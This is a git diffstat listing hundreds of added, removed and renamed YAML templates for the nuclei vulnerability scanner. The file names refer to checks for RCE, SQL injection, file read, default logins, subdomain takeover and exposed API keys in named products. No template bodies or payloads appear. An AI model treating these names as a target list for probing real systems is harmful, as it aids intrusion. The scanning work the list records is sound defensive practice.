nuclei-templates/Other/1496715494.yaml | 22 + nuclei-templates/Other/1528162206.yaml | 25 + nuclei-templates/Other/1529097781.yaml | 21 - nuclei-templates/Other/1532218426.yaml | 21 + nuclei-templates/Other/1548144737.yaml | 26 - nuclei-templates/Other/1559456844.yaml | 25 - nuclei-templates/Other/1572265847.yaml | 22 + nuclei-templates/Other/1596002635.yaml | 20 + nuclei-templates/Other/1607116612.yaml | 20 + nuclei-templates/Other/161072264.yaml | 20 + nuclei-templates/Other/1611875862.yaml | 19 - nuclei-templates/Other/1665372872.yaml | 20 + nuclei-templates/Other/1668989849.yaml | 24 + nuclei-templates/Other/1682720731.yaml | 20 + nuclei-templates/Other/1697450874.yaml | 24 + nuclei-templates/Other/1702642724.yaml | 24 - nuclei-templates/Other/1706096177.yaml | 21 - nuclei-templates/Other/1709769305.yaml | 19 + nuclei-templates/Other/1730629258.yaml | 25 - nuclei-templates/Other/173132585.yaml | 20 + nuclei-templates/Other/1775067121.yaml | 19 + nuclei-templates/Other/1776522382.yaml | 21 + nuclei-templates/Other/1790635368.yaml | 23 + nuclei-templates/Other/1817448389.yaml | 20 + nuclei-templates/Other/1830389600.yaml | 22 - nuclei-templates/Other/1847194396.yaml | 5 +- nuclei-templates/Other/1880775770.yaml | 20 - nuclei-templates/Other/1891948265.yaml | 19 - nuclei-templates/Other/1896063946.yaml | 21 + .../{3072521257.yaml => 1903063314.yaml} | 0 .../{4037176294.yaml => 1942392055.yaml} | 0 nuclei-templates/Other/1945636899.yaml | 22 - .../{3391129561.yaml => 1968322743.yaml} | 0 nuclei-templates/Other/1973925380.yaml | 26 + nuclei-templates/Other/1976842637.yaml | 20 + nuclei-templates/Other/1983841135.yaml | 19 + .../{4245649825.yaml => 2005392177.yaml} | 0 nuclei-templates/Other/2016159038.yaml | 21 - .../2021-20837.yaml} | 0 nuclei-templates/Other/2022658175.yaml | 20 + nuclei-templates/Other/2024047501.yaml | 20 + nuclei-templates/Other/2039957446.yaml | 23 + nuclei-templates/Other/2058525765.yaml | 22 + nuclei-templates/Other/206831298.yaml | 21 - nuclei-templates/Other/2074467663.yaml | 21 + nuclei-templates/Other/2077006344.yaml | 20 - nuclei-templates/Other/2084392836.yaml | 24 + nuclei-templates/Other/20875673.yaml | 23 - nuclei-templates/Other/2095252007.yaml | 20 - nuclei-templates/Other/2096616170.yaml | 21 + nuclei-templates/Other/2137267046.yaml | 25 + nuclei-templates/Other/2147006267.yaml | 21 + nuclei-templates/Other/2183647176.yaml | 24 + nuclei-templates/Other/2188834782.yaml | 11 +- nuclei-templates/Other/2201212761.yaml | 23 + .../{3228253845.yaml => 2202695844.yaml} | 0 nuclei-templates/Other/2222021882.yaml | 21 - nuclei-templates/Other/2226903579.yaml | 20 - nuclei-templates/Other/2251451509.yaml | 21 - nuclei-templates/Other/2256172448.yaml | 20 - nuclei-templates/Other/2259185335.yaml | 23 + nuclei-templates/Other/2263718067.yaml | 21 + nuclei-templates/Other/2265594678.yaml | 21 - nuclei-templates/Other/2303335172.yaml | 20 + nuclei-templates/Other/2321887670.yaml | 23 + nuclei-templates/Other/2340800564.yaml | 20 - nuclei-templates/Other/2360475771.yaml | 19 + nuclei-templates/Other/2360956852.yaml | 22 + .../Other/{230418335.yaml => 2364717091.yaml} | 0 nuclei-templates/Other/2389937585.yaml | 19 - nuclei-templates/Other/2407258475.yaml | 20 - .../{2262653179.yaml => 2409959849.yaml} | 0 .../{2388372590.yaml => 2424742596.yaml} | 0 nuclei-templates/Other/2443314716.yaml | 21 + nuclei-templates/Other/2506314282.yaml | 19 - nuclei-templates/Other/2523211837.yaml | 28 - nuclei-templates/Other/2545972775.yaml | 25 + nuclei-templates/Other/2561369502.yaml | 19 + nuclei-templates/Other/2561678402.yaml | 21 - nuclei-templates/Other/2565774650.yaml | 24 - nuclei-templates/Other/2573847404.yaml | 19 - nuclei-templates/Other/2576268398.yaml | 19 - nuclei-templates/Other/2593130726.yaml | 20 + nuclei-templates/Other/2609104929.yaml | 23 - nuclei-templates/Other/2637199254.yaml | 21 - .../{2951003169.yaml => 2639402068.yaml} | 0 nuclei-templates/Other/2665208443.yaml | 19 - nuclei-templates/Other/2667087704.yaml | 20 - nuclei-templates/Other/2690074150.yaml | 19 + nuclei-templates/Other/269469674.yaml | 20 + nuclei-templates/Other/2697533097.yaml | 24 - nuclei-templates/Other/2698047753.yaml | 20 - nuclei-templates/Other/2703184064.yaml | 23 + nuclei-templates/Other/2704416492.yaml | 21 - nuclei-templates/Other/2726089592.yaml | 26 + nuclei-templates/Other/2726646607.yaml | 20 - nuclei-templates/Other/2751226397.yaml | 26 + nuclei-templates/Other/2755030215.yaml | 21 + nuclei-templates/Other/2763023.yaml | 20 + nuclei-templates/Other/2763879923.yaml | 19 + .../{2972587261.yaml => 2770804765.yaml} | 0 nuclei-templates/Other/2774206180.yaml | 13 +- nuclei-templates/Other/2801012781.yaml | 26 + nuclei-templates/Other/2817051868.yaml | 23 - nuclei-templates/Other/2820248016.yaml | 24 - nuclei-templates/Other/2834121884.yaml | 24 - nuclei-templates/Other/2846540570.yaml | 21 + nuclei-templates/Other/2848712183.yaml | 19 + nuclei-templates/Other/2866839075.yaml | 24 + nuclei-templates/Other/288893740.yaml | 21 + nuclei-templates/Other/288961926.yaml | 20 - nuclei-templates/Other/289120970.yaml | 21 - nuclei-templates/Other/28948541.yaml | 24 - .../Other/{stratum.yaml => 2904374066.yaml} | 0 nuclei-templates/Other/2912151193.yaml | 23 - nuclei-templates/Other/29416257.yaml | 20 - nuclei-templates/Other/2992678216.yaml | 20 + nuclei-templates/Other/3003666496.yaml | 21 - nuclei-templates/Other/3118163025.yaml | 24 - nuclei-templates/Other/3123870519.yaml | 20 - nuclei-templates/Other/3143712891.yaml | 22 - nuclei-templates/Other/3154138459.yaml | 20 + nuclei-templates/Other/3168049451.yaml | 19 - nuclei-templates/Other/3170353810.yaml | 23 + .../{3051375311.yaml => 3180414547.yaml} | 0 nuclei-templates/Other/3204970294.yaml | 21 - nuclei-templates/Other/3240204170.yaml | 24 + .../Other/{990349172.yaml => 3241157799.yaml} | 0 nuclei-templates/Other/3274768380.yaml | 19 - nuclei-templates/Other/329618752.yaml | 20 + nuclei-templates/Other/330146515.yaml | 21 + nuclei-templates/Other/3309582589.yaml | 20 + nuclei-templates/Other/3311397668.yaml | 8 +- nuclei-templates/Other/3334421219.yaml | 20 - nuclei-templates/Other/3341385130.yaml | 19 - nuclei-templates/Other/3343906575.yaml | 19 + nuclei-templates/Other/335103924.yaml | 25 - nuclei-templates/Other/3380049609.yaml | 25 - nuclei-templates/Other/3413031725.yaml | 20 + nuclei-templates/Other/3435460815.yaml | 22 + .../Other/{90969961.yaml => 344455897.yaml} | 0 nuclei-templates/Other/3457192200.yaml | 23 - nuclei-templates/Other/3458805878.yaml | 19 + nuclei-templates/Other/3463894411.yaml | 19 + nuclei-templates/Other/3473184152.yaml | 22 - .../{1858552467.yaml => 3477608256.yaml} | 0 nuclei-templates/Other/3483123794.yaml | 19 - nuclei-templates/Other/3486808021.yaml | 20 + nuclei-templates/Other/3489702424.yaml | 22 + nuclei-templates/Other/3510444022.yaml | 20 + nuclei-templates/Other/3520412691.yaml | 24 - nuclei-templates/Other/3524315701.yaml | 20 - nuclei-templates/Other/3525784120.yaml | 20 + nuclei-templates/Other/3525857438.yaml | 23 + nuclei-templates/Other/3550102148.yaml | 19 - nuclei-templates/Other/3566999691.yaml | 24 - nuclei-templates/Other/3616629046.yaml | 21 - nuclei-templates/Other/3634568566.yaml | 19 + nuclei-templates/Other/3675015956.yaml | 22 - nuclei-templates/Other/3676001908.yaml | 20 - nuclei-templates/Other/3686489882.yaml | 21 - nuclei-templates/Other/3691145095.yaml | 22 + nuclei-templates/Other/3694040006.yaml | 20 + nuclei-templates/Other/3699455206.yaml | 4 +- nuclei-templates/Other/372323483.yaml | 20 - nuclei-templates/Other/3733514078.yaml | 23 - .../{3088220371.yaml => 3736820942.yaml} | 0 nuclei-templates/Other/3742378168.yaml | 24 + nuclei-templates/Other/3742541433.yaml | 26 - nuclei-templates/Other/3742836546.yaml | 19 - nuclei-templates/Other/3757448285.yaml | 21 - nuclei-templates/Other/3783141030.yaml | 20 + nuclei-templates/Other/3804058600.yaml | 19 - nuclei-templates/Other/3816201960.yaml | 20 - nuclei-templates/Other/3829723687.yaml | 20 + nuclei-templates/Other/3833918288.yaml | 21 - .../{1237096563.yaml => 3845549602.yaml} | 0 nuclei-templates/Other/3848574060.yaml | 20 + nuclei-templates/Other/3850300451.yaml | 20 - nuclei-templates/Other/3872460861.yaml | 19 - nuclei-templates/Other/3886731892.yaml | 23 - nuclei-templates/Other/3897064645.yaml | 23 - nuclei-templates/Other/3931284557.yaml | 22 + nuclei-templates/Other/3945748084.yaml | 21 + nuclei-templates/Other/3963267632.yaml | 20 + nuclei-templates/Other/397351108.yaml | 19 - nuclei-templates/Other/3976391820.yaml | 21 - .../{1099901347.yaml => 3994895432.yaml} | 0 ...ole-1.yaml => 3cx-management-console.yaml} | 0 .../Other/3g-wireless-gateway-5.yaml | 25 - .../Other/3g-wireless-gateway.yaml | 25 + ...-fileread.yaml => 3gmeeting-fileRead.yaml} | 0 nuclei-templates/Other/4001295490.yaml | 20 - nuclei-templates/Other/4010392511.yaml | 19 + nuclei-templates/Other/4028446893.yaml | 23 - nuclei-templates/Other/4034949756.yaml | 19 + nuclei-templates/Other/404669849.yaml | 21 - nuclei-templates/Other/4054511659.yaml | 21 - nuclei-templates/Other/4066336974.yaml | 24 - nuclei-templates/Other/4067066249.yaml | 21 - nuclei-templates/Other/4081216688.yaml | 21 - nuclei-templates/Other/4088014974.yaml | 22 - nuclei-templates/Other/4103243373.yaml | 21 + nuclei-templates/Other/4113431364.yaml | 20 + .../{2339729697.yaml => 4134296145.yaml} | 0 nuclei-templates/Other/415112988.yaml | 8 +- .../{1689721050.yaml => 4173490161.yaml} | 0 nuclei-templates/Other/4175279379.yaml | 20 + .../Other/{3864206087.yaml => 418069131.yaml} | 0 nuclei-templates/Other/418887523.yaml | 23 - nuclei-templates/Other/4206215244.yaml | 19 - nuclei-templates/Other/44 - T9.yaml | 34 + nuclei-templates/Other/454334927.yaml | 19 - nuclei-templates/Other/459431066.yaml | 23 + nuclei-templates/Other/471799455.yaml | 20 - nuclei-templates/Other/472063506.yaml | 24 + nuclei-templates/Other/539088528.yaml | 23 - nuclei-templates/Other/542224393.yaml | 20 + nuclei-templates/Other/545167920.yaml | 21 + nuclei-templates/Other/551082359.yaml | 21 + nuclei-templates/Other/562008096.yaml | 20 + nuclei-templates/Other/562603148.yaml | 21 + nuclei-templates/Other/56562101.yaml | 20 - nuclei-templates/Other/568669309.yaml | 24 - nuclei-templates/Other/582752737.yaml | 25 + nuclei-templates/Other/58527928.yaml | 24 + .../Other/{2459657809.yaml => 616504179.yaml} | 0 .../Other/{2686182842.yaml => 649824729.yaml} | 0 nuclei-templates/Other/660654583.yaml | 25 + nuclei-templates/Other/663188999.yaml | 19 + nuclei-templates/Other/666094080.yaml | 24 - nuclei-templates/Other/681109274.yaml | 20 + .../Other/{3512117859.yaml => 685878723.yaml} | 0 nuclei-templates/Other/688202040.yaml | 24 + nuclei-templates/Other/731885649.yaml | 25 + nuclei-templates/Other/74cms-sqli-10.yaml | 17 + nuclei-templates/Other/74cms-sqli-8.yaml | 23 - nuclei-templates/Other/74cms-sqli.yaml | 26 - nuclei-templates/Other/754693119.yaml | 22 + nuclei-templates/Other/793310164.yaml | 26 - nuclei-templates/Other/809625181.yaml | 22 + nuclei-templates/Other/836277614.yaml | 24 - nuclei-templates/Other/840401525.yaml | 7 +- nuclei-templates/Other/85151654.yaml | 21 - nuclei-templates/Other/867116384.yaml | 27 + .../Other/{398541054.yaml => 881788447.yaml} | 0 nuclei-templates/Other/910267215.yaml | 23 + nuclei-templates/Other/944179109.yaml | 23 - nuclei-templates/Other/955587354.yaml | 20 - nuclei-templates/Other/970930488.yaml | 19 + nuclei-templates/Other/974739552.yaml | 20 + nuclei-templates/Other/982982602.yaml | 24 - nuclei-templates/Other/988983539.yaml | 20 - ...kpass.yaml => APACHE-Ambari-weakPass.yaml} | 0 nuclei-templates/Other/API-Linkfinder.yaml | 22 - .../Other/Amazon-mws-auth-token.yaml | 18 + ...pereo-cas-rce.yaml => Apereo-Cas-rce.yaml} | 0 nuclei-templates/Other/CNVD-2019-06255.yaml | 27 - ...9-19299-1051.yaml => CNVD-2019-19299.yaml} | 0 ...9-32204-1053.yaml => CNVD-2019-32204.yaml} | 0 ...0-23735-1055.yaml => CNVD-2020-23735.yaml} | 0 nuclei-templates/Other/CNVD-2020-67113.yaml | 51 - ...0-68596-1076.yaml => CNVD-2020-68596.yaml} | 0 nuclei-templates/Other/CNVD-2021-01931.yaml | 29 - ...1-09650-1081.yaml => CNVD-2021-09650.yaml} | 0 nuclei-templates/Other/CNVD-2021-10543.yaml | 25 + nuclei-templates/Other/CNVD-2021-26422.yaml | 11 +- nuclei-templates/Other/CNVD-2022-03672.yaml | 38 - nuclei-templates/Other/CVE_2023_49442.yaml | 27 + .../Command Injection.yaml} | 0 ...en-fileread.yaml => DIAOWEN-fileRead.yaml} | 0 ...me.yaml => Dahua_getFaceCapture_Sqli.yaml} | 0 ...357\274\210CVE-2023-2523\357\274\211.yaml" | 39 - nuclei-templates/Other/Facebook-secret.yaml | 4 +- .../Other/GCP-service-account.yaml | 16 + .../Other/GLPI-9.3.3-SQL-Injection.yaml | 30 + ...le-leakage.yaml => GetSimple-leakage.yaml} | 0 ...-Authentication-Bypass-CVE-2024-45409.yaml | 2 +- nuclei-templates/Other/Header-Injection.yaml | 189 + .../Other/Hikvision_applyCT_RCE.yaml | 27 + ...ikvision_iVMS-8700_Fileupload_report.yaml} | 0 .../Hikvision_iVMS-8700_upload_action.yaml | 48 - ...-login.yaml => JeeSite-default-login.yaml} | 0 ...-file-list.yaml => Kingdee-file-list.yaml} | 0 ...login.yaml => Kingsoft-default-login.yaml} | 0 ...gsoft-upload.yaml => Kingsoft-upload.yaml} | 0 ...agicflow-sqli.yaml => MagicFlow-sqli.yaml} | 0 ...ead.yaml => NETSurveillance-fileRead.yaml} | 0 ...etFile_read.yaml => Nsfocus_sas_Exec.yaml} | 0 nuclei-templates/Other/Oracle-OAM-XSS.yaml | 24 + nuclei-templates/Other/PHPOK-SQLi.yaml | 35 - ...pi-key-9575.yaml => Pictatic-API-key.yaml} | 0 nuclei-templates/Other/RedMine-Detect.yaml | 21 - .../Other/Redmine-Default-Login.yaml | 54 + ...yaml => Ruijie_NBR_Router_fileupload.yaml} | 0 nuclei-templates/Other/S3Hunter.yaml | 13 + nuclei-templates/Other/SAP-NetWeaver-rce.yaml | 2 - .../Other/SpringBoot-Heapdump.yaml | 30 - nuclei-templates/Other/SymfonyRCE.yaml | 22 - .../Other/TVE-2024-105131024.yaml | 49 - .../Other/TVE-2024-105141010.yaml | 61 + ...-negative.yaml => TVE-2024-105271649.yaml} | 0 ...105272110.yaml => TVE-2024-105272055.yaml} | 0 .../Other/UnAuthenticated-Tensorboard.yaml | 27 + ...10-080723.yaml => WOOYUN-2010-080723.yaml} | 0 .../{wifisky7-rce.yaml => Wifisky-7-RCE.yaml} | 0 nuclei-templates/Other/Wireless-leakage.yaml | 20 - .../Other/{X-Host.yaml => X-Host .yaml} | 0 ...X-Remote-Addr .yaml => X-Remote-Addr.yaml} | 0 ...b-server-12.yaml => abyss-web-server.yaml} | 0 ...yaml => accent-microcomputers-lfi-16.yaml} | 0 .../{access-log-21.yaml => access-log.yaml} | 0 .../Other/access-logoss-disabled.yaml | 63 + .../Other/acemanager-login-23.yaml | 40 - .../Other/acemanager-login-24.yaml | 32 + ...detect-26.yaml => achecker-detect-27.yaml} | 0 .../Other/ack-cluster-api-public.yaml | 39 + .../Other/ack-cluster-auditing-disable.yaml | 57 + .../ack-cluster-cloud-monitor-disable.yaml | 59 + .../Other/ack-cluster-health-disable.yaml | 64 + .../ack-cluster-network-policies-disable.yaml | 63 + .../ack-cluster-network-policies-missing.yaml | 43 + .../Other/acrolinx-dashboard-36.yaml | 11 +- .../Other/active-admin-exposure-41.yaml | 27 + .../Other/active-admin-exposure-42.yaml | 18 - .../Other/activemq-default-login.yaml | 20 +- ...q-panel-50.yaml => activemq-panel-53.yaml} | 0 nuclei-templates/Other/acunetix-panel-56.yaml | 33 + nuclei-templates/Other/acunetix-panel-59.yaml | 23 - ...nabled-60.yaml => adb-backup-enabled.yaml} | 0 .../Other/addeventlistener-detect-64.yaml | 19 + .../Other/addeventlistener-detect-65.yaml | 19 - .../Other/adiscon-loganalyzer-68.yaml | 34 + .../Other/adminer-panel-fuzz-72.yaml | 46 + .../Other/adminer-panel-fuzz.yaml | 46 - ...miner-panel-74.yaml => adminer-panel.yaml} | 0 ...t-panel-78.yaml => adminset-panel-80.yaml} | 0 .../Other/adobe-coldfusion-detect-82.yaml | 62 + .../Other/adobe-coldfusion-detect.yaml | 65 - .../Other/adobe-component-login-91.yaml | 22 + .../Other/adobe-component-login-92.yaml | 23 - ...ml => adobe-connect-central-login-93.yaml} | 0 ... adobe-connect-username-exposure-101.yaml} | 0 ...ml => adobe-experience-manager-login.yaml} | 0 .../Other/adobe-media-server-112.yaml | 23 + .../Other/adobe-media-server.yaml | 31 - nuclei-templates/Other/advance-setup-119.yaml | 32 + nuclei-templates/Other/advance-setup-120.yaml | 22 - nuclei-templates/Other/advance-setup-122.yaml | 29 - nuclei-templates/Other/advance-setup-123.yaml | 19 + .../Other/advanced-access-manager-lfi.yaml | 31 - ...g-servlet.yaml => aem-bg-servlet-127.yaml} | 0 ...rx-bypass-133.yaml => aem-crx-bypass.yaml} | 0 .../Other/aem-default-get-servlet-136.yaml | 91 - .../Other/aem-default-get-servlet-138.yaml | 80 + ...ection-145.yaml => aem-detection-146.yaml} | 0 ...-servlet.yaml => aem-gql-servlet-149.yaml} | 0 nuclei-templates/Other/aem-groovyconsole.yaml | 28 + .../Other/aem-hash-querybuilder-157.yaml | 25 - .../Other/aem-hash-querybuilder-160.yaml | 29 + ...166.yaml => aem-jcr-querybuilder-162.yaml} | 0 ...tus-170.yaml => aem-login-status-169.yaml} | 0 .../Other/aem-merge-metadata-servlet-172.yaml | 24 - .../Other/aem-merge-metadata-servlet-174.yaml | 24 + ...=> aem-querybuilder-feed-servlet-175.yaml} | 0 ...m-querybuilder-internal-path-read-181.yaml | 30 + .../aem-querybuilder-internal-path-read.yaml | 24 - .../aem-querybuilder-json-servlet-182.yaml | 19 +- nuclei-templates/Other/aem-secrets.yaml | 44 - .../Other/aem-setpreferences-xss-188.yaml | 6 +- .../Other/aem-userinfo-servlet-192.yaml | 31 + .../Other/aem-userinfo-servlet-193.yaml | 31 - ...l => aem-wcm-suggestions-servlet-196.yaml} | 0 .../Other/aem-xss-childlist-selector-197.yaml | 30 - .../Other/aem-xss-childlist-selector.yaml | 35 + ...{aem-misconfig.yaml => aem_misconfig.yaml} | 0 ...ui-201.yaml => aerohive-netconfig-ui.yaml} | 0 .../Other/aftership-takeover-202.yaml | 18 + .../Other/aftership-takeover-203.yaml | 15 - .../Other/agilecrm-takeover-208.yaml | 18 + .../Other/agilecrm-takeover-212.yaml | 16 - nuclei-templates/Other/aha-takeover-214.yaml | 18 + nuclei-templates/Other/aha-takeover.yaml | 19 - .../{AIC-leakage.yaml => aic-leakage.yaml} | 0 ...21.yaml => aims-password-mgmt-client.yaml} | 0 .../Other/aims-password-portal-224.yaml | 22 + .../Other/aims-password-portal.yaml | 22 - .../Other/airee-takeover-226.yaml | 16 + .../Other/airee-takeover-228.yaml | 19 - nuclei-templates/Other/airflow-debug-231.yaml | 26 - nuclei-templates/Other/airflow-debug-233.yaml | 29 + .../Other/airflow-default-login-234.yaml | 56 + .../Other/airflow-default-login.yaml | 49 - ...ow-detect-240.yaml => airflow-detect.yaml} | 0 nuclei-templates/Other/airflow-panel-241.yaml | 38 - nuclei-templates/Other/airflow-panel-244.yaml | 37 + nuclei-templates/Other/airflow-panel-245.yaml | 24 - nuclei-templates/Other/airflow-panel.yaml | 28 + .../Other/akamai-arl-xss-248.yaml | 4 +- .../Other/akamai-cloudtest-252.yaml | 24 - .../Other/akamai-cloudtest-254.yaml | 31 + nuclei-templates/Other/akuiteo-panel.yaml | 2 +- .../Other/alfresco-detect-258.yaml | 43 + .../Other/alfresco-detect-259.yaml | 40 - .../Other/alibaba-canal-info-leak-266.yaml | 35 - .../Other/alibaba-canal-info-leak.yaml | 35 + .../Other/alibaba-cloud-code-env.yaml | 69 + ...aml => alibaba-mongoshake-unauth-270.yaml} | 0 .../Other/alienvault-usm-271.yaml | 23 - .../Other/alienvault-usm-274.yaml | 23 + .../Other/alphaweb-default-login-275.yaml | 30 - .../Other/alphaweb-default-login-277.yaml | 35 + ...\345\244\215\345\211\257\346\234\254.yaml" | 18 - .../Other/ambari-default-login-289.yaml | 26 - .../Other/ambari-default-login.yaml | 24 + .../Other/ambari-exposure-291.yaml | 19 - nuclei-templates/Other/ambari-exposure.yaml | 23 + nuclei-templates/Other/amcrest-login-296.yaml | 28 + nuclei-templates/Other/amcrest-login-299.yaml | 34 - ...login-301.yaml => ametys-admin-login.yaml} | 0 .../Other/ampps-admin-panel-306.yaml | 40 + nuclei-templates/Other/ampps-admin-panel.yaml | 35 - ...ing-308.yaml => ampps-dirlisting-307.yaml} | 0 ...ps-panel-310.yaml => ampps-panel-309.yaml} | 0 ...> android-debug-database-exposed-316.yaml} | 0 .../Other/anima-takeover-318.yaml | 18 + .../Other/anima-takeover-320.yaml | 18 - ...leDownload.yaml => anni-filedownload.yaml} | 0 .../Other/announcekit-takeover-321.yaml | 25 + .../Other/announcekit-takeover.yaml | 31 - .../Other/ansible-tower-exposure-331.yaml | 37 - .../Other/ansible-tower-exposure-332.yaml | 40 + .../Other/antsword-backdoor-333.yaml | 15 +- ...eakPass.yaml => aolynkbr304-weakpass.yaml} | 0 ...-338.yaml => apache-apisix-panel-336.yaml} | 0 ...etect.yaml => apache-axis-detect-340.yaml} | 0 ...ect-342.yaml => apache-cocoon-detect.yaml} | 0 ...che-config.yaml => apache-config-344.yaml} | 0 nuclei-templates/Other/apache-detect-348.yaml | 30 + nuclei-templates/Other/apache-detect.yaml | 31 - .../Other/apache-druid-kafka-connect-rce.yaml | 102 + ...tect.yaml => apache-dubbo-detect-351.yaml} | 0 ...l => apache-filename-brute-force-352.yaml} | 0 ...num.yaml => apache-filename-enum-354.yaml} | 0 .../Other/apache-flink-unauth-rce-355.yaml | 42 + .../Other/apache-flink-unauth-rce-356.yaml | 39 - nuclei-templates/Other/apache-flink.yaml | 31 + .../Other/apache-loadbalancer-364.yaml | 16 - .../Other/apache-loadbalancer-365.yaml | 16 + ...ce.yaml => apache-solr-log4j-rce-372.yaml} | 0 .../Other/apache-tomcat-CVE-2022-34305.yaml | 21 + .../Other/apache-tomcat-cve-2022-34305.yaml | 19 - ...-374.yaml => apache-tomcat-snoop-375.yaml} | 0 .../{apc-info-380.yaml => apc-info-378.yaml} | 0 ...-login-381.yaml => apc-ups-login-382.yaml} | 0 ...seipdb-385.yaml => api-abuseipdb-384.yaml} | 0 ...uweather.yaml => api-accuweather-386.yaml} | 0 ...fruit-io.yaml => api-adafruit-io-387.yaml} | 0 .../Other/api-alienvault-389.yaml | 4 +- ...gee-edge-391.yaml => api-apigee-edge.yaml} | 0 nuclei-templates/Other/api-asana.yaml | 21 - .../{api-bible-394.yaml => api-bible.yaml} | 0 nuclei-templates/Other/api-bingmaps-395.yaml | 19 - ...{api-bitrise.yaml => api-bitrise-397.yaml} | 0 ...lockchain.yaml => api-blockchain-399.yaml} | 0 ...newcoin.yaml => api-bravenewcoin-401.yaml} | 0 ...{buildkite.yaml => api-buildkite-402.yaml} | 0 nuclei-templates/Other/api-buttercms-403.yaml | 23 - nuclei-templates/Other/api-calendly-404.yaml | 20 + nuclei-templates/Other/api-calendly.yaml | 25 - nuclei-templates/Other/api-circleci.yaml | 3 - ...itt-411.yaml => api-cooperhewitt-409.yaml} | 0 .../Other/{api-dbt.yaml => api-dbt-413.yaml} | 0 nuclei-templates/Other/api-debounce-414.yaml | 25 - nuclei-templates/Other/api-debounce.yaml | 30 + nuclei-templates/Other/api-deviantart.yaml | 6 +- ...pi-dribbble.yaml => api-dribbble-416.yaml} | 0 nuclei-templates/Other/api-europeana.yaml | 2 +- ...pi-facebook-422.yaml => api-facebook.yaml} | 0 ...tawesome-426.yaml => api-fontawesome.yaml} | 0 ...oud.yaml => api-fortitoken-cloud-427.yaml} | 0 .../{api-github-429.yaml => api-github.yaml} | 0 nuclei-templates/Other/api-heroku-435.yaml | 25 + nuclei-templates/Other/api-heroku.yaml | 25 - ...{api-hubspot.yaml => api-hubspot-437.yaml} | 0 ...confinder-438.yaml => api-iconfinder.yaml} | 0 ...pi-improvmx-440.yaml => api-improvmx.yaml} | 0 ...{instagram.yaml => api-instagram-441.yaml} | 0 ...pi-instatus-442.yaml => api-instatus.yaml} | 0 ...pi-intercom-443.yaml => api-intercom.yaml} | 0 nuclei-templates/Other/api-ipstack.yaml | 20 + nuclei-templates/Other/api-iterable-445.yaml | 24 - nuclei-templates/Other/api-iterable.yaml | 23 + nuclei-templates/Other/api-jumpcloud-446.yaml | 22 + ...hdarkly.yaml => api-launchdarkly-449.yaml} | 0 nuclei-templates/Other/api-linkfinder.yaml | 22 + nuclei-templates/Other/api-loqate-453.yaml | 21 - nuclei-templates/Other/api-loqate.yaml | 20 + ...-mailchimp-454.yaml => api-mailchimp.yaml} | 0 ...alshare-457.yaml => api-malshare-456.yaml} | 0 .../{api-mapbox.yaml => api-mapbox-465.yaml} | 0 ...pi-mojoauth-466.yaml => api-mojoauth.yaml} | 0 nuclei-templates/Other/api-nerdgraph-469.yaml | 25 - nuclei-templates/Other/api-nerdgraph.yaml | 24 + nuclei-templates/Other/api-npm-471.yaml | 23 + ...nweather.yaml => api-openweather-473.yaml} | 0 nuclei-templates/Other/api-pagerduty-475.yaml | 22 + ...pi-pastebin.yaml => api-pastebin-477.yaml} | 0 .../Other/{pendo.yaml => api-pendo.yaml} | 0 .../{api-quip-484.yaml => api-quip.yaml} | 0 ...ksmuseum.yaml => api-rijksmuseum-486.yaml} | 0 .../{api-scanii-487.yaml => api-scanii.yaml} | 0 nuclei-templates/Other/api-slack-493.yaml | 22 - nuclei-templates/Other/api-spotify-495.yaml | 15 +- nuclei-templates/Other/api-square-496.yaml | 25 - nuclei-templates/Other/api-square.yaml | 21 + .../{api-stytch-500.yaml => api-stytch.yaml} | 0 .../{api-tink-504.yaml => api-tink.yaml} | 0 nuclei-templates/Other/api-tinypng.yaml | 23 - ...{api-twitter-507.yaml => api-twitter.yaml} | 0 ...-urlscan-508.yaml => api-urlscan-509.yaml} | 0 .../{api-vercel.yaml => api-vercel-510.yaml} | 0 .../Other/api-visualstudio-513.yaml | 26 - nuclei-templates/Other/api-visualstudio.yaml | 20 + nuclei-templates/Other/api-weglot-516.yaml | 24 + nuclei-templates/Other/api-weglot.yaml | 23 - nuclei-templates/Other/api-wordcloud-518.yaml | 45 + nuclei-templates/Other/api-wordcloud.yaml | 45 - ...{api-youtube.yaml => api-youtube-519.yaml} | 0 ...n-panel-460.yaml => apiman-panel-464.yaml} | 0 ...492.yaml => apisix-default-login-490.yaml} | 0 .../Other/apollo-server-detect-522.yaml | 36 - .../Other/apollo-server-detect-523.yaml | 37 + .../Other/apple-app-site-association-525.yaml | 22 +- ...8.yaml => appspec-yml-disclosure-529.yaml} | 0 ...rest-api-532.yaml => arcgis-rest-api.yaml} | 0 nuclei-templates/Other/argocd-detect.yaml | 26 - nuclei-templates/Other/argocd-login.yaml | 19 + .../Other/arl-default-login-537.yaml | 38 - nuclei-templates/Other/arl-default-login.yaml | 38 + .../Other/artica-web-proxy-detect-543.yaml | 18 + .../Other/artica-web-proxy-detect-544.yaml | 22 - .../artifactory-anonymous-deploy-549.yaml | 26 - .../Other/artifactory-anonymous-deploy.yaml | 24 + nuclei-templates/Other/asana.yaml | 25 + .../Other/asanhamayesh-lfi-552.yaml | 32 + nuclei-templates/Other/asanhamayesh-lfi.yaml | 25 - .../Other/aspose-pdf-file-download.yaml | 25 - .../aspose-words-file-download.yaml | 0 ...mode-575.yaml => aspx-debug-mode-579.yaml} | 0 ...84.yaml => atlassian-crowd-panel-585.yaml} | 0 ...e-login-590.yaml => atvise-login-589.yaml} | 0 ...ct-596.yaml => automation-direct-597.yaml} | 0 .../Other/avantfax-panel-602.yaml | 32 - .../Other/avantfax-panel-603.yaml | 42 + .../avatier-password-management-605.yaml | 20 - .../Other/avatier_password_management.yaml | 39 + ...rix-panel.yaml => aviatrix-panel-610.yaml} | 0 ...ml => avtech-avn801-camera-panel-613.yaml} | 0 ...n-bypass.yaml => avtech-login-bypass.yaml} | 0 ...-access-id.yaml => aws-access-id-618.yaml} | 0 ...625.yaml => aws-access-key-value-622.yaml} | 0 .../Other/aws-bucket-takeover-632.yaml | 6 +- ...-cognito-638.yaml => aws-cognito-636.yaml} | 0 ...=> aws-ecs-container-agent-tasks-641.yaml} | 0 ... => aws-elastic-beanstalk-detect-644.yaml} | 0 ...g-646.yaml => aws-object-listing-648.yaml} | 0 .../Other/aws-opensearch-login-649.yaml | 24 - .../Other/aws-opensearch-login.yaml | 21 + ...edirect-652.yaml => aws-redirect-654.yaml} | 0 ...onfig-655.yaml => awstats-config-656.yaml} | 0 ...dmin-659.yaml => axigen-webadmin-661.yaml} | 0 .../axiom-digitalocean-key-exposure-668.yaml | 16 +- .../Other/axis-happyaxis-669.yaml | 31 + .../Other/axis-happyaxis-670.yaml | 31 - ...in-671.yaml => azkaban-default-login.yaml} | 0 